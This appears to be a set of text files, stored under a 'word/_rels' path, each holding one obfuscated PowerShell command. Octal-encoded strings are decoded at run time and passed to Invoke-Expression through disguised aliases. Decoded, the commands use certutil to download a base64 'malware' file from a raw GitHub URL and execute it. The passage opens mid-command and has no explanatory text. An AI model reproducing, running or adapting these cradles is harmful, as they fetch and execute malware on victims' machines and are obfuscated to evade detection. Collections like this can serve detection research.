' ' ) "|. ( $enV:CoMSPeC[4,15,25]-jOIN'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding2_compress_1.txt>. ( $ENv:comspEC[4,24,25]-joiN'') (" $(SEt-iTeM  'vaRIAbLe:ofS' '' ) " +[strinG]('44V105:111@161:64>147l61M40V75:40@40:133e103@110N101l122N133@135>135>40e42>51M47N47l116>151N157e112N55l135N65N62N54l66:62M54@64N133@103>105M120N123l155N157l103V72:166h116N105l44M40>50@46:40e174h51V62l71>135Q122:101>110N103V133:40>106>55>40@51e47V145:170V145l56l141V175M47M53h47>60Q173l175l47>53M47N60V173h143Q151:154Q142V165Q160l175:60l47:53:47>173h175h60h173:163>162M145:163N165>175M60:47N53Q47N173>175e47>53e47:60V47M53Q47>173l72Q143Q40V141>175h60e173V175M60@173e143V151M154l142@47l53V47e165h47@53@47M160M175l60M47>53:47>173h175e60@173h163N162>145M163l165M175N60:173N175V47N53h47M60Q173e47V53h47e72>143l40N145e144h157M143e145h47@53l47N144h55l40@47V53e47@154N151e164@165Q164>162@145e143M40@47V53M47h73e141@175V60l173e175e60M173:143>151V47e53N47:154>142h165@160l175h60e47N53@47@173N175:60N173e163:162l47V53N47:145h163@165>175>60e173N47N53:47@175>60h173Q72l143>40V164e170N164h56M163Q153M141h145N162M142:157h156l137l64>66:142l137Q145Q47N53:47N162M141h47>53l47l167Q154l141@155V57Q162Q145h164h163e47M53>47:141M155>57l164h163h145e47:53l47Q164:47M53e47V57:147>156e151V150h47M53>47e164h163V151N150h164h145N153@141h155h141>156h156l165h147>164e163Q165h47:53M47Q152V155N151N57>155:157V143N56@164:156h145@164V47l53e47>156>157M47e53N47l143>162Q145e163l47M53>47>165>142N47Q53>47V165M150h164e151l147V56>47V53>47V167M141M162M57V57:72@163@160h164h164N47h53e47:150:47l53l47l40Q146e55>40Q164:151N47@53M47M154>160>163N55N47M53>47:40@145h150M143M141N47@53Q47e143>154Q47V53V47>162V165>55M40l154Q151V164:47l53:47@165@164l162N145M143Q47>50N50e40Q42>40M73>40h133@101e162e122@141@131l135>72M72h122Q105V166:145Q162h123:105l50:50e40M166@101M122l151@101N142:154@145@40l40:50N47h145M47h53Q47M151e161@64>47@53N47e107l61Q47M51e40l55Q126:101>114Q51@51N73V133N123Q164:162V151e156V147l135:72>72:152:157V151h116Q50:40@47h47:54l40@50:40h166Q101h122h151@101M142Q154@145e40>40e50e47V145e47>53:47l151>161V64@47V53@47N107V61M47@51l40h55h126N101M114N51Q51N174Q46M50e40M44h163V150:105l154l114>111:144>133:61l135h53l44e163e150:105V154l154M151e104h133:61V63N135h53N47h170>47M51'.spLIT('@:VMQeN>lh' ) | % {([chAR]( [ConvERT]::TOiNt16( ($_.tostrinG()) ,8) ))}) +"$( Set  'OFs'  ' ' ) ")

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding3.txt>[sTRIng]::jOIN( '', ('123H126v40v50Y47:152{47}53{47v66@130}47{51P40P50@133}103,150e141@122v133Y40e135H40e135H42v51H47@47e116H111}157v152,55e135,62H54{61Y61}54v63Y133e105}115,101H156:56Y51H47v52H122H144e155@52@47v40,105P154v142v101:111e122:101}166v50e50{56,40:174,40}51@62,71:135Y162}141e150H103v133Y106Y55H51:47{145v170Y145v47P53e47@56@141,175H60P173v47Y53P47Y175e60,173H47{53@47}143Y151Y154@142{165:160v175}60e173v47:53}47@175e60,47Y53}47e173@47v53@47H163,47Y53P47e162@145:163,47}53e47P165@175Y60v173,175@47v53e47:60{173@72H143,40Y47@53@47:141Y175P60,173,175:47Y53e47v60@47}53,47{173{47@53Y47H143:151}154H142,165Y160:175,60v173,47@53v47@175{60P173{163}162,47H53@47v145@163P165@175:60}173e175,47e53Y47v60,173:72}47@53e47,143e40H145@144Y157,143}145Y144,47e53e47e55}47H53P47@40v154H151H164e165v47H53e47Y164P162Y145{143H40P47P53{47P73P141e47,53H47Y175{60{173e175@60v173@47P53H47:143}151v154P142,47v53:47v165H160v47H53@47e175}47H53Y47v60}173}175P60:173e163P162:47,53Y47v145P163Y165{175}60v47H53P47P173}47e53v47H175}47:53@47{60Y173,47:53Y47v72@143,40H164H47H53e47H170:164}47}53P47}56@163{153:141}47P53P47@145,162:47H53v47v142,157e156v137}64:66@142}47:53v47}137{47P53,47Y145}162v141,167P47:53Y47H154P141{47,53}47}155e57P162v47}53Y47,145H164@47@53P47e163}141{155H57P164H163:145:164{47H53}47P57Y147}156,151e47Y53:47,150@164,163{47e53v47P151:150Y47}53@47,164v47{53:47P145@47H53Y47P153}141{47,53e47P155H141P156:156v165}47:53e47Y147e47e53{47e164P163P165{152v155v47@53v47,151{57:155H157P143e56e164:156{145{164{156}157@47@53v47}143:47,53Y47,162v145,163{165e142{47v53@47@165{150v47e53v47,164:47P53:47:151,147{56}167H47}53}47}141}162P47}53Y47:57v57:72{163Y160,47:53v47v164,164v150}47P53Y47:40P146:55,40@164,47@53}47H151P154P160e47{53H47:163:47v53e47v55e40:145v150@47v53,47e143e141,47e53H47{143@47{53{47H154H162v165Y55e40@154@151e164}165:164:162,145:143Y47Y50Y50e40}42@40v40}51v73P40e133}141Y122:122@101}171P135e72,72,122,105{126Y145:162v163H105v50v40P50@147{145{164H55@166}141}162P111e101,142@114e145H40,50P47{112v47P53,47{66H130{47}51:40}40:55v166,101P154Y165{105v40{40:51:40e51H73P40P55}112P157,151v116H40}50P147}145e164,55P166:141@162,111}101@142Y114@145v40}50:47:112P47@53:47Y66@130{47,51e40,40v55Y166@101v154H165}105,40P40P51{174:46e40e50{40P50H133v163Y124Y162@111v156,147{135@44e166@145:122@142,117e123@105:160H162e145{106@145Y162}145}156:103}145e51:133H61}54H63{135@53@47H170Y47,55:152,117e151,156}47{47P51'-SpLIt 'e'-SPlIt'{'-sPLit','-SpLiT'@'-SpLiT 'P' -sPLit 'H'-spLiT 'v'-SPLiT '}'-sPlit':' -SPLIT'Y'| fOrEaCH-oBjEct { ([Char] ([cOnvert]::toiNT16( ( [STrING]$_ ),8) )) } ))| iNVoKe-eXPrESSIoN

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding3_compress_1.txt>. ( $PsHome[21]+$psHOME[34]+'x')( [striNG]::JOiN( '' ,('44K126S70%127!61j152z164Y75K40!40{133{143o150D101%122z133%40Y135K135z40o42S51K47S47%116o151z117D152S55K135j65D62%54!65j61!54S64Y133o143D105{160z123{115{117{103S72K166Y116o145%44o40D50S40!46j174j51S62{71%135D162Y141o110j103S133o135Y107o116z111z122o164j163D133{54K51D62{60%61S135o162o141Y110Y103{133j53o65o61o61D135{162Y141S110o103D133D53o64S67j135K162{141j110j103D133D50%50o105j103z141D114K120K145{122D56!51Y47z145S170z47%53%47S145o47K53D47K56z141z47D53j47j146D47j53Y47D163D112S146S47K53{47S163o47!53o47K112{143%47S53{47z151o154K142o165!47%53o47o160K146Y163o47j53S47K112j47{53%47K146%163j112%163j162z145S163S165z146z163j112D146S163o112{47j53Y47z72z143j40{141D146o163S112%146!163D112o143%151o154S142z165Y160{146{163j112!146j47!53!47Y163D112D163!162D145K47!53D47S163K47z53j47{165{47j53%47o146o163j112%146S163!112z72S143Y40D145D144D157z143D47%53%47!145%144K55K40%154!151D164Y47D53o47o165Y164S47j53{47S162!145z143j40D73%141!146j163S47D53%47K112%146Y163K112{47%53j47K143%151z154j142S47o53o47S165z160{47S53!47z146K163{112z146{163j112S163j162{145{163{165%146S163o112%146S47D53o47K163S112S47!53S47o72K143Y40D164Y47S53o47{170Y164K56S163z47z53o47S153%141%47o53Y47z145S162Y142Y157K156D137{64j66o142z137{145{162!141z167Y154{47D53D47D141j155j57S47K53o47{162o47%53{47Y145Y47j53!47j164!163K141D155S47!53S47z57!47j53D47o164j163D145S164!57S47z53!47z147!156!151j150D47S53z47K164j163S151j150o47!53S47S164D145{153z141D155K141z156Y156!165D147D164K163S165S152{47Y53K47K155o151j57{155j157o47Y53D47o143%56o164%47z53!47K156{47z53Y47%145j47z53z47%164o156o47{53%47K157{143Y162D145z47!53D47j163Y165%142%165z150D164Y151!147D47Y53!47j56Y167{141o162Y57%57%72z163z47!53j47z160K47{53Y47z164K164S150S40j146!55{40Y164S151S154j160o163%55j47S53Y47o40o145Y150z47o53z47{143{141!47{53Y47z143z154Y162j165Y55S47Y53S47Y40!47%53D47j154K151S164{165%164K47Y53{47z162o145S143z47!50{42!40z73!40!133{101Y162Y122j141z171D135%72{72z122Y105o126Y105Y122!123z105Y50S50K40D40{147S105z164K55!126S141!162j151{101j102j154{105S40z50j42D166{70{127%42S53S42K61o152o164%42K51o40z40j51Y56!126!101K114j125%105{40j51!73%40D133o163D124S122S151z156j107j135j72o72!152!117S111z116K50{47S47K54o40o50!40o40K147Y105z164z55{126Y141o162Y151Y101!102{154{105o40Y50o42%166Y70D127D42j53o42D61%152{164{42Y51!40!40o51!56D126D101j114D125K105o51Y174j40j46{50S40o44z105%116z126S72o103!117!155j163Y160S105z143D133!64!54Y62K64D54%62S65S135o55%112S157S151j156%47z47z51'-spLIT'o' -splIT '{' -spliT'%'-SPlIt 'j' -SPlIT 'S' -sPlit'K' -SpLIT 'Y' -sPlIt '!'-SpLiT'D'-sPLIT'z' | fOREacH-OBJEct{([CoNvErt]::Toint16( ([stRiNg]$_ ),8)-aS[chaR]) }) ) )

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding4.txt>ieX( ( '123i145U124g55,126,101U122Z111h141h102{114,145U40i40U50{42@143i65g157J127<42,53i42J145,130<42<51Z40,50U40g40@42J51h47g47<156{151U117U152@55i135,65@62,54@66h62U54h64U133g103,145<120h163J155,117<143J72J126{116U105,44J40h50<46i174h51g62,71@135h122h101{150i103i133U54,47i156Z115i66{47h40J40,145g143{141{114J120J145{122J103g55@40h51g47,145@170J47i53U47i145@47<53h47J56<141@156{115J66@156J115{66h143,151,154J47{53<47{142<47J53@47U165J160{156,115Z66i156<115J66J163J47,53Z47,162,145J47U53{47{163i165J47U53{47J156g115@66h47U53,47<156<115U66U47h53<47J72g47<53Z47J143J40@141Z156{115<66h156@47{53{47i115,47g53<47Z66J143{151g154,142h165g160Z156h115J47U53{47@66,47i53J47Z156J115,66{163Z47Z53Z47,162{145Z163<165,156J115J66g156<115g66Z72@47h53<47,143g40J145,144@157{143<47h53<47g145,47h53Z47i144,55J40J47<53U47<154h151J164J165{164@162U145J143g47J53{47h40@73@141h47g53g47Z156J115@66h156<115J66,143,151U154g47g53g47i142h165J160U156U115{47i53h47g66{156,115Z47i53{47@66U163J162<145,163@165i47@53<47J156Z115,47@53i47{66@47U53g47i156Z115Z47U53{47<66,72h143{40,47<53U47,164i170U164,47h53{47Z56,163g153U141@145{162g142{157J156U47{53U47{137Z64h66U47<53,47@142,137<145@47U53i47{162J47i53,47U141Z167<154g141<47@53@47{155g57{162g145@164U163i47<53{47U141Z155h57i164i163U145{164J57i147<156@151i150<164g163,151g150g164i145i153<47J53Z47@141U155U141J156{156Z165i147i164g163<165U152i155g151@47J53J47,57,47{53U47i155@157{143,56i47<53J47g164g156@145,164<47i53i47@156<157J47U53{47@143<162g145i47Z53@47i163Z165i142{165U150g164<151,47,53,47{147,56,167h141@162U57g57J72<163@160Z164U47g53{47U164J150<40<146g55J40U164J151h154<47<53,47J160{163,47,53g47Z55h40U145<150U47J53@47h143<141U143J154J162<165h55{47{53{47i40Z154g151,164Z165Z164J162i145Z143U47i50Z50i40g40,42g40J40Z51{40i73U40g55J112J117,151{156<40<50<40{40h111@164@105U115U40U40J50U42{126h101{122<42U53i42<111Z141U142<154@145<72J143h65i42Z53,42i117@42i53i42{167i145,42,53h42<170h42@51@40i51U56Z166{141@154h125J145,133@55Z61@56g56{55U40h50g50,40g40h111h164{105<115h40h40@50@42{126i101<122U42@53i42,111Z141J142,154i145,72i143g65U42i53<42<117i42<53@42,167i145g42g53J42h170,42@51Z40@51g56@166h141J154U125,145,56{154i145,116{107J124U110{51h40@135@40,174h40{56<50i40@44<105i116{126i72i103J117Z155Z123g160Z105J103g133,64g54Z62Z64i54g62g65J135,55i112Z157U111,116@47J47Z51'.SPLIt( '{<gZ,@UhiJ')| % {([Char] ([conVErt]::tOInt16(($_.tOstRiNg() ),8 )))})-JOiN '')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding4_compress_1.txt> IEX( [STrinG]::JOin('' , ( (163,105, 164,40 , 40, 50 , 47,120,123,47 ,53 ,47 ,147,47,51, 40 , 50, 133 ,143, 110 , 101, 122,133 ,135 , 135, 40 ,42,51 ,47 ,47 , 156,151, 117 ,152 ,55, 47, 130 , 47 ,53, 135 ,63,54 , 61 ,133,51 ,50 ,107,116,151 ,122 ,164 , 163 ,157 , 124 ,56 , 105 ,103, 156 , 105,122, 105 , 146,145 ,162 ,160 , 105,123 , 157,142,122 , 105, 166, 44,40,50,40, 46 ,174,51 , 62 , 71, 135 ,122 , 101 , 110, 103 , 133, 106 , 55 , 40 , 51,47 ,145 ,170,145, 56,141, 47, 53 , 47 , 175 , 47, 53 ,47, 60, 173, 175 , 60 , 173 ,143, 151, 154,142 ,165,160, 175 , 47,53, 47, 60 ,173 ,175 ,47, 53 ,47, 60 ,47, 53 , 47 , 173, 163, 162, 145, 163, 165 , 175 , 60,173 ,175,60, 173,47, 53 ,47 ,72, 143, 40 , 47, 53 , 47, 141, 175 , 60, 173 , 175,60 ,47 , 53 , 47,173,143 , 151 , 154,142,165,160,175 , 60, 173 ,175 ,60 , 173 ,163, 47 , 53 , 47,162 , 145 ,163, 165 , 175 ,60,173,175 , 60,173 ,72 ,143, 40 , 145 , 144, 157,143,145 , 144 , 55 ,47 , 53 ,47, 40,154, 151 , 164,165 , 164, 162 ,145 , 143, 40 ,73 ,47, 53,47 ,141 ,175, 60, 47, 53 , 47, 173 , 175,60, 47, 53, 47 ,173, 143 ,151 , 154,142 ,47, 53,47, 165 , 160 ,47 , 53, 47 ,175, 60,173 ,175 ,60, 173,163 , 162 ,145 ,163 ,165, 47 ,53 ,47 , 175 ,60,173 , 175, 60 ,173 ,47 , 53 , 47,72,143, 40 ,47,53 , 47,164, 170 , 47 ,53 ,47, 164,56, 163 , 153, 141,145,162,142,157 , 47 ,53 , 47 ,156,47 ,53, 47, 137, 64 , 66, 142,47 , 53 ,47 , 137,145, 47, 53,47,162, 47 ,53 , 47, 141 ,167, 47, 53, 47 ,154, 141,155 ,57 ,162 ,145 , 164 ,163,141 ,155 , 57 , 164 , 47 , 53,47 , 163 ,145 , 164 ,57 , 47 ,53 , 47,147, 156 ,151,150 ,47 ,53 ,47 ,164,163,151 , 150, 164 ,145 , 153, 141 ,155 , 141, 156 ,156 , 165, 47 , 53 , 47 , 147,164,163,165 ,152 , 47 ,53, 47 , 155,151 , 57 ,155 , 47, 53,47 ,157, 143 ,56 ,47 ,53 ,47,164,156, 145 ,164, 156 ,47, 53, 47 ,157 , 143,162 ,145 ,163 ,165, 142, 165 , 150,164 , 151 ,147, 56,167 ,141 ,162 ,57 , 57, 72,47 , 53, 47 , 163 , 47 , 53, 47 ,160 ,164,164 , 150 ,40, 146,55,40 , 164 ,151, 47, 53 , 47, 154 ,160, 163 , 47 ,53 ,47 , 55, 47,53,47, 40, 145 , 47, 53 ,47 ,150, 143 ,141 , 47 , 53 ,47, 143, 154, 162 , 47 ,53,47 ,165,55 , 40 , 47, 53,47 ,154 , 47,53,47 ,151, 164 ,165 ,164 ,162,47 , 53, 47, 145 , 143 , 47, 50 , 50 , 40 ,42 ,40 ,51,73 ,40 , 133, 101, 162 , 122,101, 131,135,72, 72 , 122, 145,126 , 145,162,123 , 145 , 50, 50, 40 ,147 ,105 , 164, 55 ,166, 101 , 162 , 111,141,102 , 114,105 ,40 , 50,47,120 , 123, 47 , 53,47,147,47,51,51 , 56,126,101 ,114 , 125 ,105 ,40,51 , 40 ,73, 40 , 46, 50 ,40, 44 ,123,150 , 105,154 , 114 ,111, 104 ,133,61, 135 ,53 ,44,163 ,150 ,145 , 114 , 154 ,111, 104 ,133 ,61 , 63,135, 53 ,47,170 , 47 ,51 ,40 , 50 , 40 , 55,112, 117 , 111,156 ,50,40, 147 ,105, 164 , 55,166 , 101,162 ,111 ,141, 102,114,105 ,40 , 50,47 , 120, 123 , 47 , 53 ,47 , 147 , 47 , 51 ,51 , 56 ,126 , 101,114, 125 ,105 , 51 ) |foreAcH{([chaR]([coNVErt]::TOint16( ([sTrIng]$_),8) ))} )) ) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding5.txt>[STRIng]::joiN('', ('44P101e65P71m170e124U114m75U42T40a51e40%51T62U71;135e162P141a150e103%133U135U147P116U151U162U124%123{133e54%51T64U60;61m135a162{141U150m103;133T53e71P70e135e162;141e150;103;133q53m61%60P61;135e162a141P150T103T133P50q50;145a103P101a114U160T145e162m56;51{47;145U170%145U56{141m150%131{145a150T131e145U143q47a53q47a151;154%142;165T47m53;47m160m150m47a53P47;131T145{150a131q145P163m47m53;47q162a145;47P53%47%163e165{150e131P47m53m47e145m150U131{145P72U47a53m47;143{47U53T47q40q47m53a47e141;150{131T145m150m131e145q47q53e47P143U151{154U47{53e47T142q165{47;53{47U160T150U131U145m150;131q145T47U53T47q163P47q53m47e162U145U163q165%150a131P47P53a47U145{47;53%47m150U131T145q47T53e47P72P143%40{145e144e157P143e145m144%47q53m47;55e40T154e151a164P165e164e162;145U47T53m47a143%40{73a141{47q53T47T150P131T145P150;131q145;143%151{154U142%165{160T150%131q145{150{131q47U53P47m145;163q162P145m47P53{47{163;165P150U131e47P53U47m145T150q131P145a72{143T40q47{53a47m164e170T164{56q163e153{141m47q53m47m145P47q53m47;162P142q157a156m137;64T66U142q137P145P162T141q167T154T141m155m57T162T145m164a47T53T47q163U141%155a57;164;163{145T164e57{47U53{47m147;156q151T150T164m163e151{47e53U47P150e164T145%153P141m155;141q156{156P47%53P47e165e147a164{163P165U152%155a151e57%155m47m53T47%157T143e56;47a53;47a164P156a145e164U156m157;47%53%47m143m47;53;47{162;145m163P165P142m165m150%164e151e147e56a47{53a47T167e141a162m57e57a72P47a53%47{163e160m164;164P150q47e53U47U40;146;55a40P164%151T154e160q163a55e40a145e150m143m141U143e154m162q165%55q40m154a151T47%53{47U164q165;164;47e53%47T162P47m53e47{145e143%47m50m50T51U47T170e47m53T135e60T63q133q105m115{117e150U123T160T44q53q135%64T133%105T115;117a110%163;120e44q40P50m40{46e42P73{50;40a151{124U145%115U40T40%126%141%122%151e141a102U114;145P72a141;65{71P130T164T154U51%56T166;141P114T125{105P133a55%61;56;56;40e55m40P50;50{40m151U124{145a115e40q40U126q141{122;151{141T102;114U145%72%141q65P71{130%164m154;51%56T166P141q114P125%105q56m114U105T156P107q164U150q51m135{55q112P117T111;156m47T47a40m174U40P56P50e40%44e123P110m105m154U154U151a104m133T61T135;53{44m163{150{105%114{114;151q104U133U61{63{135P53T47P130U47P51' -Split'P' -Split'{' -spLIT '%' -sPlIT 'T' -splIT 'U'-sPLIt 'm' -Split 'a' -SPLiT 'e'-sPlIt'q'-splIt';' |%{ ( [ChAR]([coNVert]::tOINt16(( [strIng]$_),8 ) )) })) | &( $PshoMe[4]+$psHOME[30]+'x')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding5_compress_1.txt>[STRiNg]::join('' , ( ( 44,62 , 71,113 ,66, 40 , 75,133,103, 150,101 , 162,133,135 , 135 , 42, 51 , 47 , 170, 47 ,53 ,135,60 , 63 , 133 ,105,155,157 ,150 , 123 , 120 , 44 ,53 ,135 , 64,133 ,105,155 , 157, 150,123 ,120 , 44 , 40,50, 46 , 174 ,40 ,51 , 47 ,134 , 47 , 54 ,51 ,71 ,67 ,135 , 162,101,110 ,103 , 133,53, 67,67 ,135 , 162 , 101,110, 103, 133 ,53 ,64 , 65 , 135,162 ,101,110 , 103, 133, 50 , 50 , 105 , 103, 141, 154, 120 , 105 , 122 ,56 ,51 ,47 , 145, 47 , 53 ,47,170 ,145 , 47, 53, 47 ,56,141 ,47,53,47, 117,115, 66 ,117 , 115 , 66 ,143 ,151, 154,142 , 165, 47,53 ,47 ,160,117 ,115,47,53, 47,66, 47,53,47 ,117 , 47 ,53 ,47 ,115, 47 ,53 ,47 ,66 ,163 ,47 ,53 , 47 , 162, 145,163,47,53 , 47 , 165,117 ,115, 66,117,115,66 , 72 ,143 ,40 , 141 ,47,53 , 47,117 ,47 , 53, 47,115, 66 ,117 , 115 , 47 ,53 ,47 , 66 ,143,47 , 53,47 ,151,154 , 47, 53 , 47 , 142 ,47, 53 ,47 ,165 ,47 ,53,47, 160, 117,47, 53,47 ,115,66, 47 ,53 ,47 ,117,115 , 66 , 163, 162,145 , 47 ,53 , 47 , 163 , 165 , 47 , 53, 47,117 ,47,53,47 ,115, 66 ,117, 115 ,47 , 53, 47 ,66 ,72 ,143, 40,47,53 ,47, 145 ,144, 157,143,145 , 144 , 55 , 40,154,151 ,164 ,47 ,53, 47 ,165 ,47 ,53, 47 ,164, 162 , 47,53 ,47,145, 143,40,73 ,141 ,117, 115,66,117,115 ,66 , 143, 47 ,53 ,47, 151,154 , 142, 47 , 53 , 47, 165, 160 ,117 ,115 , 66, 47 ,53 , 47,117, 47,53 , 47 ,115, 66 , 163 , 162 ,145, 163, 47 , 53, 47 , 165,47 ,53 ,47, 117 , 115 , 66,117 ,47 ,53 ,47 ,115,66, 72, 143,40,164,170, 164, 47 ,53,47,56 ,47 , 53 ,47,163 , 153 ,141,145 ,47 ,53 ,47 ,162 ,142, 157 ,47 , 53, 47 , 156, 47 , 53 ,47 , 137 ,64 , 66 ,142 , 137, 145,162, 141 ,167 , 154 , 141 ,47, 53 , 47 ,155 , 47,53,47 , 57, 162 , 145,164, 163 ,47,53,47,141 ,155, 57, 47, 53 ,47 ,164,47 ,53,47 , 163,145 , 47 , 53 ,47 , 164,57, 147 ,156,151, 150 ,164 ,163,151, 150, 164,47,53 ,47 ,145 , 153,141,155 , 47 , 53, 47 ,141, 156 ,156 ,165, 147,47, 53, 47, 164 ,163, 165 , 152,155, 151 ,57, 47, 53 , 47,155 ,47 , 53,47, 157, 143 ,56,164 , 156, 145 ,164 ,156 ,157,143 , 162 ,145,47,53 ,47,163,165 , 142, 165,150,47 ,53,47 , 164 ,151 ,147 ,47 , 53 , 47, 56, 167, 141,162 , 47, 53,47, 57 , 57 ,72, 47, 53 , 47 ,163,160, 164, 47 ,53 ,47 ,164,150 ,40,146, 55, 40, 47,53 , 47 , 164,151,154,160,163 ,55,40, 145,150,47,53 ,47,143 , 141,143 ,47,53,47, 154, 162 ,165,55 ,40 , 154,151 ,164 , 47 ,53 , 47,165, 47 ,53 , 47 ,164 , 47 ,53 , 47 ,162,145,47 ,53, 47 , 143 , 47 , 50,42 , 73,40 ,133,101,162, 122 , 101,131, 135,72 , 72,162,145 ,166 , 105 , 122, 123 ,145,50, 50 , 40,40,107 , 145 , 164, 55,166, 141 ,162 , 111 ,141, 102 ,154, 145 ,40,40 , 50, 47 , 62 ,71,153 ,47, 53 , 47, 66 , 47 , 51 , 40 ,40 ,55, 126,101 ,114,125 ,105,40,40 , 51, 51 ,73,133,163 ,164 , 162 , 151 , 116 ,107, 135,72,72 , 152 , 157,151, 116, 50 , 47,47 , 54,50,40, 40,107, 145,164 ,55 , 166 ,141 ,162 , 111 , 141, 102 , 154 , 145,40 , 40 ,50,47, 62,71,153,47 , 53, 47,66,47,51,40 ,40, 55, 126 , 101, 114 , 125 , 105,40,40 ,51,51,174 , 40,111,105,130 ) | FoREach { ( [CHAR]( [cOnvErt]::toinT16( ([sTRING]$_),8) ))}) )| .( $ENv:cOMSPEC[4,15,25]-JOIn'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding6.txt> . ( $enV:COMsPEc[4,26,25]-joiN'') (-join('123>145>164M40>125p104v66>40{40p50M42p40M51M40>51T62v71K135M122v141K110:103:133{40U40>146U55M40M40T51T47M145x170>145:56v141p175M47p53{47U60>47U53:47T173:175T60x173:47:53:47:143>151K154>142U165x160{175p60>173M175K47M53U47v60{173p163v47p53U47x162T145p163K165x175:60K173v175:60K173M72{143x40>141:175>60v47x53:47:173v175:60v47T53v47T173v143T151M47T53T47v154K47M53:47{142x165>160U175>60M173p175M60T173v163{47p53{47x162K145x47T53p47p163:165>175T60K173M175M60>173T72K143v40v47p53x47K145T144M157p143>145T144>47p53T47p55:40M154K151>47>53v47>164{165T164T47v53U47U162K145>47x53T47K143U47{53T47>40{73v141p47M53M47:175p60U173v175:60K173T143U151{154U142x165v160M175U60>173>175M60K173:163x47:53:47p162T145>47{53p47>163{165:47U53p47p175T60T47M53U47T173:175x60v173v72K143v40{47K53v47K164{170x164K56v163:47p53p47v153{47M53>47T141K47{53{47M145x162T47{53K47v142U157{156K137>64K66U142U137U47{53{47M145>162U141M167p47:53U47U154K141{155p57:162p47T53U47U145v47v53M47x164:163K47p53U47>141T47T53p47:155x57K164>163x145:47U53T47U164p57>147U156K47:53{47{151T47p53>47p150T47K53{47>164p163{151M150K164p145U47>53x47K153T141v155U141{156U156U165K147:164:163>165v47p53x47v152M155K151M57v155:157:143M56{164v156M47U53v47U145p164x156M157:143:162{47>53T47p145:47K53{47v163v165{142{165U47x53{47>150x164:151v47M53v47U147:56U167{141:162x57M57v47M53K47{72{163p160p164T164K47T53K47T150M40{146x55v40K164x151p154>160:163M55:40T145U150M143p141U143K154M47{53p47U162U165U55T40p47p53T47:154M151M164M165{164T162v145v143:47K50p50>50M51x47p47>156v151T157>152v55U135M62M54{61{61{54K63:133>145{115p101U156x56K51>47{52U122K104>155M52>47>40:145T114>142>141{151p162M101v126p55U124p105>107:50{50v56M42>40T40M51:40>73{40{40{46K50M40x44:163v150U105{154x154x111>104T133M61T135M53v44{163U110K105v114T154T151T104>133T61U63>135>53:47T130v47K51v50x40x133p163T124:162K111U116p147x135{72U72M152>157T151v156{50{40T47K47T54>40:50:40p40U166:101>162x111>101{142>154{105>40:40T165v104x66T40v51{56v126T101M154>125T105M133v55>40{61{56{56v40:55x50p50v40>40>166U101>162K111{101p142M154U105K40:40x165U104K66{40{51v56U126p101{154M125{105K56M114v145K156v147U164:110>40:51{135p51T40M51'-spLIt 'M' -SpLIT '{' -split'p' -sPliT 'v'-SpliT 'T' -sPliT '>'-spliT 'K' -SPliT 'x'-spliT'U' -sPLIT':' |%{ ([CONveRt]::tOINT16( ([StriNg]$_) ,8 )-aS[CHar])} )) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding6_compress_1.txt>&( $eNv:cOmSpec[4,24,25]-JOin'')( ( '40n133}123_124B122_111}116n147}135:72z72M152K157K151B116n50z47_47M40n54n40P50P40n133P122K145M147D145M170M135D72K72B155}101D124B103}150n105z123B50D42D51}40z51n62K71_135:162_101n110M103D133P106M55n51:47z145z47n53z47n170K47_53_47_145:47z53n47B56M141:175n60:47M53:47n173:175D60:173}143P47B53n47B151_47M53B47n154:142}165P160P47K53B47:175_60:47M53M47z173K175z47K53K47_60z47D53D47:173}163n162D145n163M165:175z47M53}47_60}173D175K47_53}47n60M173}72K143K40D47P53z47n141D47P53}47}175:60z173_175}60n173D143D47B53K47M151P47P53z47M154n142_47M53}47_165P160}47P53D47_175P60D173K175n60n173M163}162D47n53z47:145M163B47n53K47D165}175D60B173_175:60D173n72M143D47K53P47n40z145z144M157B143B145P144}55z47D53n47}40_154K151_164K165}47z53K47M164}162z47D53:47P145z143:47P53D47:40D73M141K175z60:47K53:47B173:47B53:47:175z47D53}47K60P173}143K151:154M47}53B47K142_165P160z47M53B47z175K47K53M47_60P47z53D47}173:175:60_47P53B47K173z163n47:53:47_162n145:163}165B175}60}173n175B60z173K72}47n53_47D143B40:47D53}47z164M170_47}53_47K164_56B163z153z141z145n162_142D157_156}137:64_66:142}137M145K162K47D53_47B141B167n154K141n155}57n47n53n47n162}145z164K163_141D155D57D164z163z145}164K57n47B53K47P147P156n151P150D164_163_151P150B47P53B47}164K145M153n141B47}53B47z155n141B156D156D165:147}164P163K165z152K155D151_47:53P47:57}47n53D47D155_157}143P56}164n156P145M164B156B157_143n162n145D163:165:47:53z47z142D47:53B47n165K150n164M151B47}53K47D147D47M53n47P56_167K141P162K57z57z72P163P160D164z164n47D53_47z150M47B53:47B40D47z53z47K146:55z40P164n151B47}53P47_154B47D53D47}160P47P53K47P163P47K53M47_55:40B145:150P143P141K47n53n47n143B47n53_47_154K162n165n47}53K47_55K40D154P151:47z53z47n164P165_164}162:47z53K47D145_47P53M47P143P47M50D50_40n50P156M117}151:123n123_105:162B160M170:105n55K105_153P157B166P156D151n40_42:40:54B40n47P56z47}40_54n47M162_151P147P110z124n124}157B154n145_106P124z47}40n51z40K174z146z157M162:105M141z143D110K55K117n102:112:105B103z124}173}44z137M56B166M141K154B165:145_175M51_40P51P40K174K46_50}40K44:145}116K126P72n143:117B115n163z160:145_143D133_64}54P62z66B54B62M65M135K55M112P117_111}156K47}47K51'.sPLit( 'P}_DKn:BzM' ) | forEaCH{ ( [cONVErt]::TOInT16(( $_.tostrINg() ),8 )-AS [ChaR])} )-jOIn '' )

</file>

